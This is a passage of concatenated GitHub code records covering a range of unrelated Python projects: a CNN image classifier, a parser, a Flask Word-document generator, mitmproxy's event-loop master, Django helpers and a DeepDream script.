'ciężarówka']\n\n#implementacja modelu sieci neuronowej\nmodel = Sequential([\n Convolution2D(filters=128, kernel_size=(5,5), input_shape=(32,32,3), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=128, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n MaxPool2D((2,2)),\n Convolution2D(filters=64, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=64, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n MaxPool2D((2,2)),\n Convolution2D(filters=32, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=32, kernel_size=(5,5), activation='relu', padding='same'),\n BatchNormalization(),\n MaxPool2D((2,2)),\n Convolution2D(filters=16, kernel_size=(3,3), activation='relu', padding='same'),\n BatchNormalization(),\n Convolution2D(filters=16, kernel_size=(3,3), activation='relu', padding='same'),\n BatchNormalization(),\n Flatten(),\n Dense(units=32, activation=\"relu\"),\n Dropout(0.15),\n Dense(units=16, activation=\"relu\"),\n Dropout(0.05),\n Dense(units=10, activation=\"softmax\")\n])\n#implementacja otymalizatora, funkcji straty oraz metryki\noptim = RMSprop(lr=0.001)\nmodel.compile(optimizer=optim, loss='categorical_crossentropy', metrics=['accuracy'])\nmodel.summary()\n\n#uczenie przygotowanego przez nas modelu na danych treningowych i walidacyjnych\nhistory = model.fit(\n X_train,\n to_categorical(y_train),\n epochs=80,\n validation_split=0.15,\n verbose=1\n)\n#sprawdzenie skuteczności wytrenowanego algorytmu na danych testowych\neval = model.evaluate(X_test, to_categorical(y_test))\neval\n\n#wywołanie funkcji do rysowania wykresu dokładności względem epok\ndraw_curves(history, key1='accuracy',ylim1=(0.7, 1.00))\n\n#wywołanie funkcji do rysowania wykresu funkcji straty względem epok\ndraw_curves(history, key1='loss',ylim1=(0.00, 2.50))\n\n#wizualizacja filtrów\nfor layer in model.layers:\n if 'conv' in layer.name:\n weights, bias= layer.get_weights()\n f_min, f_max = weights.min(), weights.max()\n filters = (weights - f_min) / (f_max - f_min)\n print(layer.name, filters.shape)\n filter_cnt=1\n for i in range(filters.shape[3]):\n filt=filters[:,:,:, i]\n for j in range(filters.shape[0]):\n ax= plt.subplot(filters.shape[3], filters.shape[0], filter_cnt )\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(filt[:, j])\n filter_cnt+=1\n plt.show()\n\n#wizualizacja map cech\nimg_path='C:/Users/natal/Desktop/plane.jpg'\nsuccessive_outputs = [layer.output for layer in model.layers[1:]]\nvisualization_model = tf.keras.models.Model(inputs = model.input, outputs = successive_outputs)\nimg = load_img(img_path, target_size=(32, 32))\nx = img_to_array(img)\nx = x.reshape((1,) + x.shape)\nx /= 255.0\nsuccessive_feature_maps = visualization_model.predict(x)\nlayer_names = [layer.name for layer in model.layers]\nfor layer_name, feature_map in zip(layer_names, successive_feature_maps):\n print(feature_map.shape)\n if len(feature_map.shape) == 4:\n n_features = feature_map.shape[-1]\n size = feature_map.shape[ 1]\n display_grid = np.zeros((size, size * n_features))\n for i in range(n_features):\n x = feature_map[0, :, :, i]\n x -= x.mean()\n x /= x.std ()\n x *= 64\n x += 128\n x = np.clip(x, 0, 255).astype('uint8')\n display_grid[:, i * size : (i + 1) * size] = x\n scale = 20. / n_features\n plt.figure( figsize=(scale * n_features, scale) )\n plt.title ( layer_name )\n plt.grid ( False )\n plt.imshow( display_grid, aspect='auto', cmap='viridis' )","repo_name":"nataliastas/Neural-networks","sub_path":"CNN/uczenie_maszynowe.py","file_name":"uczenie_maszynowe.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"21283424163","text":"\"\"\"\nThis function gets called during every request by the\ncontext processor to return all the custom html for a specific path.\n\"\"\"\nimport re\n\nfrom ecommerce_extensions.tenant.extra_options import check_attributes_required, set_default_option\n\n\ndef process_html(path, options):\n \"\"\"\n Process and loads all the extra html for the template\n rendered during the request.\n\n Parameters:\n path (string): a regex for a url of a given site\n options (dict): a list of separate html separated by a path\n\n Returns:\n dict: a list of separate html scripts validated according to regex in path\n \"\"\"\n html_list = options.get('html', {})\n html_returns = {}\n\n if not isinstance(html_list, dict):\n return html_returns\n\n for regex, values in html_list.items():\n regex_path_match = re.compile(regex)\n if regex_path_match.match(path):\n for html in values:\n set_default_to_html = set_default_option(\n html,\n 'location',\n ['head', 'body_start', 'body_end'],\n 'body_start'\n )\n\n # Validate 'content' key in html\n is_validate_html = check_attributes_required(\n set_default_to_html,\n ['content'],\n \"HTML\"\n )\n\n if is_validate_html:\n html_returns[set_default_to_html['location']] = set_default_to_html['content']\n\n return html_returns\n","repo_name":"eduNEXT/ecommerce-extensions","sub_path":"ecommerce_extensions/tenant/extra_html.py","file_name":"extra_html.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70965636034","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom pygan.gans_value_function import GANsValueFunction\n\n\nclass MiniMax(GANsValueFunction):\n '''\n Value function in GANs framework.\n '''\n\n def compute_discriminator_reward(\n self,\n true_posterior_arr,\n generated_posterior_arr\n ):\n '''\n Compute discriminator's reward.\n\n Args:\n true_posterior_arr: `np.ndarray` of `true` posterior inferenced by the discriminator.\n generated_posterior_arr: `np.ndarray` of `fake` posterior inferenced by the discriminator.\n \n Returns:\n `np.ndarray` of Gradients.\n '''\n grad_arr = np.log(true_posterior_arr + 1e-08) + np.log(1 - generated_posterior_arr + 1e-08)\n return grad_arr\n\n def compute_generator_reward(\n self,\n generated_posterior_arr\n ):\n '''\n Compute generator's reward.\n\n Args:\n generated_posterior_arr: `np.ndarray` of `fake` posterior inferenced by the discriminator.\n \n Returns:\n `np.ndarray` of Gradients.\n '''\n grad_arr = np.log(1 - generated_posterior_arr + 1e-08)\n return grad_arr\n","repo_name":"Flipkickisreal/Hackathon2020Team3","sub_path":"library/accel-brain-code-master/accel-brain-code-master/Generative-Adversarial-Networks/pygan/gansvaluefunction/mini_max.py","file_name":"mini_max.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23543828531","text":"gi=int(input())\r\n#take the test cases\r\nfor gi in range(gi):\r\n #takes the va;ues\r\n xi=input().split()\r\n n=int(xi[1])\r\n f=[]\r\n #initialising the variables\r\n k=0\r\n k=k+1\r\n ij=k%10\r\n c=0\r\n gkl=ij/15\r\n #for loop\r\n for i in range(len(xi[0])):\r\n if(xi[0][i]=='+'):\r\n f.append(1)\r\n gkl=gkl+1\r\n else:\r\n f.append(0)\r\n l=len(f)\r\n ddy=l\r\n #for loop \r\n for i in range(l-n):\r\n if(f[i]==0):\r\n for j in range(i,i+n):\r\n f[j]^=1\r\n c+=1\r\n klm=k%9\r\n i+=n\r\n summ=0\r\n # taking the sum\r\n for i in range(l-n,l):\r\n summ+=f[i]\r\n print('Case',end=' ')\r\n print('#',end='')\r\n print(gi+1,end=': ')\r\n if(klm==k):\r\n k=0\r\n if(summ==n):\r\n print(c)\r\n elif(summ==0):\r\n print(c+1)\r\n else:\r\n print('IMPOSSIBLE')\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/2568.py","file_name":"2568.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"27971390927","text":"from django.db.models import F, Count\nfrom django.utils import timezone\n\n\ndef thread_post_save(instance, **kwargs):\n from .models import Board\n thread_count = instance.board.threads.count()\n Board.objects.filter(pk=instance.board_id) \\\n .update(thread_count=thread_count)\n\n\ndef post_post_save(instance, **kwargs):\n from .models import Board, Thread, Post\n thread = instance.thread\n thread_post_count = thread.posts.count()\n board_post_count = Post.objects.filter(thread__board=thread.board) \\\n .aggregate(num=Count('pk'))['num']\n Thread.objects.filter(pk=instance.thread_id) \\\n .update(post_count=thread_post_count, updated=timezone.now())\n Board.objects.filter(pk=thread.board_id) \\\n .update(post_count=board_post_count)\n\n\ndef thread_post_delete(instance, **kwargs):\n from .models import Board, Post\n thread_count = instance.board.threads.count()\n post_count = Post.objects.filter(thread__board=instance.board) \\\n .aggregate(num=Count('pk'))['num']\n Board.objects.filter(pk=instance.board_id)\\\n .update(thread_count=thread_count,\n post_count=post_count)\n","repo_name":"julianwachholz/thefarland","sub_path":"apps/boards/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1234870367","text":"import numpy as np\nimport random, time, pylsl\nfrom time import sleep\nfrom pylsl import StreamInfo, StreamOutlet, StreamInlet, resolve_streams\n\ndef main():\n info = StreamInfo('MyMarkerStream', 'Markers', 1, 0, 'string', 'myuidw43536')\n\n streams = pylsl.resolve_streams(wait_time=3.)\n inlet = []\n for stream in streams:\n name = pylsl.StreamInlet(stream).info().name() \n print(name)\n if (name == \"RValues\"):\n inlet = pylsl.StreamInlet(stream)\n\n outlet = StreamOutlet(info)\n\n UP = 'UP'\n DOWN = 'DOWN'\n high = 0.5 #閾値の設定\n low = 0.2\n inlet.open_stream() # バッファ開始\n sleep(.1) # バッファにある程度データをためる\n\n while True:\n # データ取得\n if True:\n d, _ = inlet.pull_chunk(max_samples=1024) # バッファにあるデータを全部取る\n assert(len(d) < 1024) # 念のため、全部取り切れていることを確認する\n try:\n sample = np.array(d)[-1,1] # とってきたデータの最後の部分を使う\n except: # サンプリングレートが落ちてバッファが空になることもあるので...\n pass # その時はpassしてごまかす\n print(sample)\n\n #閾値に応じて文字列を出力\n if(sample > high):\n outlet.push_sample([UP])\n if(sample < low):\n outlet.push_sample([DOWN])\n time.sleep(3)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Waffle1415/LSL","sub_path":"LSL_Android.py","file_name":"LSL_Android.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22802566692","text":"# 创建字典\r\nd1 = {}\r\nd1 = dict()\r\n# 字典的键必须是不可变类型,键不可以修改,不可以重复,但值可以改\r\nd2 = {1:30, 'name':'tom',True:20,1:90}\r\nd1 = dict(a = 1, b = 2)\r\nd1 = dict([(1,2),(3,4)])\r\nprint(type(d1),d1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zhenguo96/test1","sub_path":"Python基础笔记/6/代码/12.创建字典.py","file_name":"12.创建字典.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"15629652101","text":"class RuleClass:\n\tdef __init__ (self, id, symbol, production, cursor, lookAheads):\n\t\tself.id = id\n\t\tself.symbol = symbol\n\t\tself.production = production\n\t\tself.cursor = cursor\n\n\t\tif not isinstance(lookAheads, set):\n\t\t\tif isinstance(lookAheads, list):\n\t\t\t\tlookAheads = set(lookAheads)\n\t\t\telse:\n\t\t\t\tlookAheads = set([ lookAheads] )\n\n\t\tself.lookAheads = lookAheads\n\n\tdef __eq__ (self, other):\n\t\tif (isinstance(other, RuleClass)):\n\t\t\tequalSymbol = self.symbol == other.symbol\n\t\t\tequalProd = self.production == other.production\n\t\t\tequalCursor = self.cursor == other.cursor\n\t\t\tequalLookAheads = self.lookAheads == other.lookAheads\n\t\t\treturn equalSymbol and equalProd and equalCursor and equalLookAheads\n\t\telse:\n\t\t\treturn False\n\n\tdef prettyPrint (self, cursor=True):\n\t\t# use a copy to avoid modifying original prodution list\n\t\tprod = self.production.copy()\n\n\t\t# print cursor\n\t\tif cursor:\n\t\t\tif (self.cursor >= len(prod)):\n\t\t\t\tprod.append(\".\")\n\t\t\telse:\n\t\t\t\tprod[self.cursor] = \".\" + prod[self.cursor]\n\n\t\tprod = ''.join(prod)\n\n\t\treturn f\"({self.id}) {self.symbol} -> {prod}\\t\\t{self.lookAheads}\"\n\n\t# returns the production symbol this rule is currently expecting to read\n\tdef expecting (self):\n\t\tif (self.cursor >= len(self.production)):\n\t\t\tpass\n\t\telse:\n\t\t\treturn self.production[self.cursor]\n\n\tdef nextExpected (self):\n\t\tif not self.expecting():\n\t\t\treturn None\n\n\t\tif (self.cursor +1 >= len(self.production)):\n\t\t\treturn None\n\n\t\treturn self.production[self.cursor +1]\n\n\t# returns true if the cursor is at the end of the production\n\t# i.e.: the rule has been recognized\n\tdef hasRecognized (self):\n\t\treturn self.cursor >= len(self.production)\n\n\t# similar is same symbol, same prod and same cursor\n\t# used to detect similar rules when merging lookAheads\n\tdef isSimilarTo (self, other):\n\t\tsameSymbol = self.symbol == other.symbol\n\t\tsameProd = self.production == other.production\n\t\tsameCursor = self.cursor == other.cursor\n\n\t\treturn sameSymbol and sameProd and sameCursor\n\nclass RuleGroupClass:\n\tdef __init__ (self):\n\t\tself.rules = []\n\t\treturn\n\n\tdef __eq__ (self, other):\n\t\tif (isinstance(other, RuleGroupClass)):\n\t\t\tcloneSelf = self.rules.copy()\n\t\t\tcloneOther = other.rules.copy()\n\n\t\t\ttry:\n\t\t\t\tfor c in cloneSelf:\n\t\t\t\t\tindex = cloneOther.index(c)\n\t\t\t\t\tcloneOther.pop(index)\n\t\t\texcept ValueError:\n\t\t\t\treturn False\n\n\t\t\treturn len(cloneOther) == 0\n\t\telse:\n\t\t\treturn False\n\n\tdef addRule (self, rule):\n\t\tif (not isinstance(rule, RuleClass)):\n\t\t\traise TypeError()\n\n\t\tif rule in self.rules:\n\t\t\treturn\n\n\t\tself.rules.append(rule)\n\n\n# class that represents a transition from one state to another\nclass TransitionClass:\n\tdef __init__ (self, symbol, origin, destination):\n\t\tself.symbol = symbol\n\t\tself.origin = origin\n\t\tself.destination = destination\n\n# used by the parser to read input\nclass IterClass:\n\tdef __init__ (self, chain: list):\n\t\tself.chain = chain\n\t\tself.currIndex = 0\n\n\tdef consume (self) -> None:\n\t\tself.currIndex += 1\n\n\tdef current (self) -> str:\n\t\tif self.currIndex >= len(self.chain):\n\t\t\treturn \"EOF\"\n\t\telse:\n\t\t\treturn self.chain[self.currIndex]\n","repo_name":"lemoslemos/basic-LALR-1-parser","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"38953165352","text":"from docx import Document\nfrom flask import Flask, request, render_template, current_app\nimport tkinter.filedialog as filedialog\nfrom tkinter import Tk\nfrom datetime import datetime\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n # HTMLフォームを表示するためのテンプレートを返す\n return render_template(\"input_form.html\")\n\n\n@app.route(\"/get_text\", methods=[\"POST\"])\ndef get_text():\n # フォームから入力されたテキストを取得\n doc_number = request.form[\"doc_number\"]\n doc_date_str = request.form[\"doc_date\"]\n doc_date = datetime.strptime(doc_date_str, \"%Y-%m-%d\")\n draft_date_str = request.form[\"draft_date\"]\n draft_date = datetime.strptime(draft_date_str, \"%Y-%m-%d\")\n drafter = request.form[\"drafter\"]\n summary = request.form[\"summary\"]\n authorizere = request.form[\"authorizere\"]\n input_text = request.form[\"input_text\"]\n\n root = Tk()\n root.withdraw() # メインウィンドウを非表示にする\n filepath = filedialog.asksaveasfilename(defaultextension=\".docx\", filetypes=[(\"Word Document\", \"*.docx\")])\n\n # Word文書を生成して保存\n with current_app.app_context():\n generate_docx(filepath, input_text, doc_date, doc_number, draft_date, drafter, summary, authorizere)\n\n # 応答メッセージを返す\n return \"ファイルが保存されました。\"\n\n\ndef convert_to_fullwidth_numbers(text):\n # 半角数字と対応する全角数字の辞書を定義\n halfwidth_numbers = \"0123456789\"\n fullwidth_numbers = \"0123456789\"\n num_conversion = str.maketrans(halfwidth_numbers, fullwidth_numbers)\n\n # 変換を行って返す\n return text.translate(num_conversion)\n\n\n# 全文を改行及び文字数で区切ってリストに入れる\ndef slice_txt_into_list(full_txt, slice_length):\n sliced_list = []\n lines = full_txt.split(\"\\r\\n\") # 改行でテキストを分割\n\n for line in lines:\n while len(line) > slice_length:\n sliced_list.append(line[:slice_length])\n line = line[slice_length:]\n\n if line:\n sliced_list.append(line)\n\n return sliced_list\n\n\ndef generate_docx(output_path, full_txt, date, doc_num, drft_date, drft_person, summary_content, author):\n # 39字ごとに区切ってリストに入れる\n draft_content = slice_txt_into_list(full_txt, 39)\n\n # 決済者によってWordテンプレートを選択して開く\n if author == \"町長\":\n document = Document(\"起案文書様式.docx\")\n elif author == \"副町長\":\n document = Document(\"起案文書様式(副町長まで).docx\")\n else:\n document = Document(\"起案文書様式(課長まで).docx\")\n\n # 文書内の表を取得する\n table = document.tables[0]\n\n # 文書番号欄のセルを取得\n doc_num_cell = table.cell(1, 8)\n\n # 文書番号欄の説に文書番号を入力\n doc_num_cell.text = doc_num\n\n # 文書の日付欄のセルを取得\n date_cell = table.cell(2, 8)\n\n # 文書の日付を和暦に変換&数字を全角に変換\n doc_year_int = int(date.strftime(\"%Y\"))\n\n doc_year = convert_to_fullwidth_numbers(str(doc_year_int - 2018))\n doc_month = convert_to_fullwidth_numbers(date.strftime(\"%m\"))\n doc_day = convert_to_fullwidth_numbers(date.strftime(\"%d\"))\n\n # 文書の日付を和暦に変換\n jpn_doc_date = f\"令和{doc_year}年{doc_month}月{doc_day}日\"\n\n # 文書の日付欄のセルに日付を入力\n date_cell.text = jpn_doc_date\n\n # 起案日&起案者欄のセルを取得\n draft_date_cell = table.cell(3, 2)\n\n # チェック\n # 起案の日付を和暦に変換&数字を全角に変換\n drft_year_int = int(drft_date.strftime(\"%Y\"))\n\n drft_year = convert_to_fullwidth_numbers(str(drft_year_int - 2018))\n drft_month = convert_to_fullwidth_numbers(drft_date.strftime(\"%m\"))\n drft_day = convert_to_fullwidth_numbers(drft_date.strftime(\"%d\"))\n\n # 文書の日付を和暦に変換\n jpn_drft_date = f\"令和{drft_year}年{drft_month}月{drft_day}日\"\n\n # 起案日と起案者を同じセルに入力するため連結\n drafter_date = \"起案 \" + jpn_drft_date + \"\\n\" + \"\\n\" + drft_person\n\n # 起案日&起案者を入力\n draft_date_cell.text = drafter_date\n\n # 摘要欄のセルを取得\n summary_content_cell = table.cell(4, 4)\n\n # 摘要欄に内容を入力\n summary_content_title = \"摘要\\n\" + summary_content\n summary_content_cell.text = summary_content_title\n\n # 本文を起案文書様式の6行目から入力\n line_num = 6\n\n for draft in draft_content:\n # 表のline_num行目、0列目にあるセルを取得する\n cell = table.cell(line_num, 0)\n\n for paragraph in cell.paragraphs:\n paragraph.text = paragraph.text.replace(\"\\r\", \"\")\n # セル内のテキストを上書きする\n cell.text = draft\n line_num += 1\n\n # 上書きした文書を保存、保存場所指定\n document.save(output_path)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=8000, debug=True)\n","repo_name":"piezoh/final_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17543035589","text":"import tkinter as tk\n\nfrom src.VeinSegmentation.Skeletonization import skeletonLenght\n\n\nclass VeinMetricsModal:\n def __init__(self, parent):\n self.parent = parent.children['!app']\n self.top = tk.Toplevel(parent)\n self.top.transient(parent)\n title = \"Métricas\"\n self.top.title(title)\n\n x = self.parent.winfo_x()\n y = self.parent.winfo_y()\n self.top.geometry(\"+%d+%d\" % (x + 300, y + 200))\n\n area = self.parent.processing.getMaskArea()\n isSkeletonized = self.parent.isSkeletonized\n pixelSize = self.parent.pixelSize\n print('Area in pixels is {} px'.format(area))\n if pixelSize:\n squarePixelSize = (1 / pixelSize) ** 2\n tk.Label(self.top, text=\"Area de la selección: {} cm2\".format(area / squarePixelSize)).pack()\n if isSkeletonized and pixelSize:\n measure = skeletonLenght(self.parent.processing.getCleanedSkeleton(), pixelSize)\n tk.Label(self.top, text=\"Longitud de la red venosa: {} cm\".format(measure)).pack()\n if not pixelSize and not isSkeletonized:\n tk.Label(self.top, text=\"Debes seleccionar una referencia para poder obtener información\").pack()\n\n def cancel(self):\n self.parent.focus_set()\n self.top.destroy()\n","repo_name":"nestorojeda/VeinSegmentation","sub_path":"src/Components/Modals/VeinMetricsModal.py","file_name":"VeinMetricsModal.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"59945487","text":"import sys\nimport traceback\nimport threading\nimport asyncio\nimport logging\n\nfrom mitmproxy import addonmanager\nfrom mitmproxy import options\nfrom mitmproxy import controller\nfrom mitmproxy import eventsequence\nfrom mitmproxy import command\nfrom mitmproxy import http\nfrom mitmproxy import websocket\nfrom mitmproxy import log\nfrom mitmproxy.net import server_spec\nfrom mitmproxy.coretypes import basethread\n\nfrom . import ctx as mitmproxy_ctx\n\n\n# Conclusively preventing cross-thread races on proxy shutdown turns out to be\n# very hard. We could build a thread sync infrastructure for this, or we could\n# wait until we ditch threads and move all the protocols into the async loop.\n# Until then, silence non-critical errors.\nlogging.getLogger('asyncio').setLevel(logging.CRITICAL)\n\n\nclass ServerThread(basethread.BaseThread):\n def __init__(self, server):\n self.server = server\n address = getattr(self.server, \"address\", None)\n super().__init__(\n \"ServerThread ({})\".format(repr(address))\n )\n\n def run(self):\n self.server.serve_forever()\n\n\nclass Master:\n \"\"\"\n The master handles mitmproxy's main event loop.\n \"\"\"\n def __init__(self, opts):\n self.should_exit = threading.Event()\n self.channel = controller.Channel(\n self,\n asyncio.get_event_loop(),\n self.should_exit,\n )\n\n self.options: options.Options = opts or options.Options()\n self.commands = command.CommandManager(self)\n self.addons = addonmanager.AddonManager(self)\n self._server = None\n self.waiting_flows = []\n self.log = log.Log(self)\n\n mitmproxy_ctx.master = self\n mitmproxy_ctx.log = self.log\n mitmproxy_ctx.options = self.options\n\n @property\n def server(self):\n return self._server\n\n @server.setter\n def server(self, server):\n server.set_channel(self.channel)\n self._server = server\n\n def start(self):\n self.should_exit.clear()\n if self.server:\n ServerThread(self.server).start()\n\n async def running(self):\n self.addons.trigger(\"running\")\n\n def run_loop(self, loop):\n self.start()\n asyncio.ensure_future(self.running())\n\n exc = None\n try:\n loop()\n except Exception as e: # pragma: no cover\n exc = traceback.format_exc()\n finally:\n if not self.should_exit.is_set(): # pragma: no cover\n self.shutdown()\n loop = asyncio.get_event_loop()\n for p in asyncio.Task.all_tasks():\n p.cancel()\n loop.close()\n\n if exc: # pragma: no cover\n print(exc, file=sys.stderr)\n print(\"mitmproxy has crashed!\", file=sys.stderr)\n print(\"Please lodge a bug report at:\", file=sys.stderr)\n print(\"\\thttps://github.com/mitmproxy/mitmproxy\", file=sys.stderr)\n\n self.addons.trigger(\"done\")\n\n def run(self, func=None):\n loop = asyncio.get_event_loop()\n self.run_loop(loop.run_forever)\n\n async def _shutdown(self):\n self.should_exit.set()\n if self.server:\n self.server.shutdown()\n loop = asyncio.get_event_loop()\n loop.stop()\n\n def shutdown(self):\n \"\"\"\n Shut down the proxy. This method is thread-safe.\n \"\"\"\n if not self.should_exit.is_set():\n self.should_exit.set()\n ret = asyncio.run_coroutine_threadsafe(self._shutdown(), loop=self.channel.loop)\n # Weird band-aid to make sure that self._shutdown() is actually executed,\n # which otherwise hangs the process as the proxy server is threaded.\n # This all needs to be simplified when the proxy server runs on asyncio as well.\n if not self.channel.loop.is_running(): # pragma: no cover\n try:\n self.channel.loop.run_until_complete(asyncio.wrap_future(ret))\n except RuntimeError:\n pass # Event loop stopped before Future completed.\n\n def _change_reverse_host(self, f):\n \"\"\"\n When we load flows in reverse proxy mode, we adjust the target host to\n the reverse proxy destination for all flows we load. This makes it very\n easy to replay saved flows against a different host.\n \"\"\"\n if self.options.mode.startswith(\"reverse:\"):\n _, upstream_spec = server_spec.parse_with_mode(self.options.mode)\n f.request.host, f.request.port = upstream_spec.address\n f.request.scheme = upstream_spec.scheme\n\n async def load_flow(self, f):\n \"\"\"\n Loads a flow and links websocket & handshake flows\n \"\"\"\n\n if isinstance(f, http.HTTPFlow):\n self._change_reverse_host(f)\n if 'websocket' in f.metadata:\n self.waiting_flows.append(f)\n\n if isinstance(f, websocket.WebSocketFlow):\n hf = [hf for hf in self.waiting_flows if hf.id == f.metadata['websocket_handshake']][0]\n f.handshake_flow = hf\n self.waiting_flows.remove(hf)\n self._change_reverse_host(f.handshake_flow)\n\n f.reply = controller.DummyReply()\n for e, o in eventsequence.iterate(f):\n await self.addons.handle_lifecycle(e, o)\n","repo_name":"panoslin/DouYinSpider","sub_path":"venv/Lib/site-packages/mitmproxy/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"61"}
+{"seq_id":"18330799528","text":"from enum import Enum\n\n\nclass Location:\n def __init__(self, name, minimum, maximum, gamble):\n self.name = name\n self.min = minimum\n self.max = maximum\n self.gamble = gamble\n\nlocations = {\n 'farm': Location('farm', 10, 20, False),\n 'cave': Location('cave', 5, 10, False),\n 'house': Location('house', 2, 5, False),\n 'casino': Location('casino', 0, 50, True)\n }\n\n# Django cannot access class values directly. This list of dictionaries\n# is for the Django view version of locations to use to display info.\nlocations_dict = [\n locations['farm'].__dict__,\n locations['cave'].__dict__,\n locations['house'].__dict__,\n locations['casino'].__dict__\n ]\n\nclass GambleResult(Enum):\n WIN = 'earned'\n LOSE = 'lost'\n\n\nclass Activity:\n def __init__(self, gamble_result, amount, location, dt):\n self.gamble_result = gamble_result\n self.amount = amount\n self.location = location.__dict__\n self.time = dt\n\n def __str__(self):\n print(f'Location: {self.location}')\n if self.location['gamble']:\n new_action = f'Entered a {self.location[\"name\"]} and '\n new_action += 'won ' if self.gamble_result == GambleResult.WIN.value else 'lost '\n new_action += f'{self.amount} gold! '\n new_action += 'Ouch!!! ' if self.gamble_result == GambleResult.LOSE.value else ''\n else:\n new_action = f'Earned {self.amount} gold from the {self.location[\"name\"]}! '\n new_action += f'({self.time})'\n return new_action\n","repo_name":"JasonHarrer/DojoORM_NinjaGold","sub_path":"mainsite/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7314305335","text":"###############################################################################\n# Deep Dreamer\n# Based on https://github.com/google/deepdream/blob/master/dream.ipynb\n# Author: Kesara Rathnayake ( kesara [at] kesara [dot] lk )\n###############################################################################\n\nfrom os import mkdir, listdir\nfrom subprocess import PIPE, Popen\n\nimport numpy as np\nfrom caffe import Classifier, set_device, set_mode_gpu\nfrom deepdreamer.images2gif import writeGif\nfrom scipy.ndimage import affine_transform, zoom\nfrom PIL.Image import fromarray as img_fromarray, open as img_open\nimport logging\n\nlogging.basicConfig(\n filename='log.txt',\n format='%(asctime)s %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.NOTSET)\n\n\ndef _select_network(netname):\n if netname == 'bvlc_googlenet':\n NET_FN = \"deploy.prototxt\" # Make sure force_backward: true\n PARAM_FN = \"bvlc_googlenet.caffemodel\"\n CHANNEL_SWAP = (2, 1, 0)\n # ImageNet mean, training set dependent\n CAFFE_MEAN = np.float32([104.0, 116.0, 122.0])\n return NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN\n elif netname == 'googlenet_place205':\n # TODO: refit SWAP and MEAN for places205? These work for now.\n NET_FN = \"deploy_places205.protxt\" # Make sure force_backward: true\n PARAM_FN = \"googlelet_places205_train_iter_2400000.caffemodel\"\n CHANNEL_SWAP = (2, 1, 0)\n # ImageNet mean, training set dependent\n CAFFE_MEAN = np.float32([104.0, 116.0, 122.0])\n return NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN\n else:\n print(\"Error: network {} not implemented\".format(netname))\n\n\ndef _preprocess(net, img):\n return np.float32(np.rollaxis(img, 2)[::-1]) - net.transformer.mean[\"data\"]\n\n\ndef _deprocess(net, img):\n return np.dstack((img + net.transformer.mean[\"data\"])[::-1])\n\n\ndef _make_step(\n net, step_size=1.5, end=\"inception_4c/output\", jitter=32, clip=True):\n \"\"\" Basic gradient ascent step. \"\"\"\n\n src = net.blobs[\"data\"]\n dst = net.blobs[end]\n\n ox, oy = np.random.randint(-jitter, jitter+1, 2)\n\n # apply jitter shift\n src.data[0] = np.roll(np.roll(src.data[0], ox, -1), oy, -2)\n\n net.forward(end=end)\n dst.diff[:] = dst.data # specify the optimization objective\n net.backward(start=end)\n g = src.diff[0]\n # apply normalized ascent step to the input image\n src.data[:] += step_size/np.abs(g).mean() * g\n # unshift image\n src.data[0] = np.roll(np.roll(src.data[0], -ox, -1), -oy, -2)\n\n if clip:\n bias = net.transformer.mean[\"data\"]\n src.data[:] = np.clip(src.data, -bias, 255-bias)\n\n\ndef _deepdream(\n net, base_img, iter_n=10, octave_n=4, octave_scale=1.4,\n end=\"inception_4c/output\", clip=True, **step_params):\n # prepare base images for all octaves\n octaves = [_preprocess(net, base_img)]\n\n for i in range(octave_n-1):\n octaves.append(zoom(\n octaves[-1], (1, 1.0/octave_scale, 1.0/octave_scale), order=1))\n\n src = net.blobs[\"data\"]\n\n # allocate image for network-produced details\n detail = np.zeros_like(octaves[-1])\n\n for octave, octave_base in enumerate(octaves[::-1]):\n h, w = octave_base.shape[-2:]\n if octave > 0:\n # upscale details from the previous octave\n h1, w1 = 